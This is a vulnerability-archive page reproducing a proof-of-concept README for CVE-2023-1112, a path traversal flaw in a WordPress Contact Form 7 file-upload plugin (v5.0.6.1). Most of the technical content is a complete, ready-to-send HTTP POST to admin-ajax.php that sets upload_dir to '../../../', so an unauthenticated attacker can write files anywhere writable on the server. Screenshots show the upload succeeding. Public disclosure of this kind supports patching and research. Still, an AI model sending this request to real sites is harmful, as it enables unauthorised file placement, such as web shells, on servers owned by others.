Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-1112 PoC — Drag and Drop Multiple File Upload Contact Form 7 admin-ajax.php path traversal

Source
https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal
Associated Vulnerability
Title:Drag and Drop Multiple File Upload Contact Form 7 admin-ajax.php path traversal (CVE-2023-1112)
Description:A vulnerability was found in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 on WordPress. It has been classified as critical. Affected is an unknown function of the file admin-ajax.php. The manipulation of the argument upload_name leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222072.
Description
Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)
Readme
# CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal

# Info
Path Traversal in Drag and Drop Multiple File Uploader PRO - Contact Form 7 version 5.0.6.1 allows unauthenticated remote attacker to upload files anywhere writable on the remote server (CVE-2023-1112).

To exploit this vulnerability, the attacker needs to upload a file using the plugin's form. On this post request there needs to be the parameter `upload_name`, which value is the name of the folder to which the file will be uploaded. The attacker can put anything he wants, such as `../`, `../../../`, `foldername` (it will create the folder "foldername" on the upload directory), etc.

# Example

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

```
# Screenshots

### Normal request
![image](https://user-images.githubusercontent.com/3837916/216743824-2a11a7e6-d954-4a1d-ac98-7ddc0d996dcd.png)

### Malicious request
![image](https://user-images.githubusercontent.com/3837916/216743964-378a88d4-ed53-481b-a748-8c09c9868070.png)

### Malicious request successully uploaded the file to the webserver root
![image](https://user-images.githubusercontent.com/3837916/216744024-50997229-58d5-4e76-9e74-aa4c9fc27a00.png)
File Snapshot

 [4.0K]  /data/pocs/a38151b305553c29d88255fe7d78afa53cf189bc
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →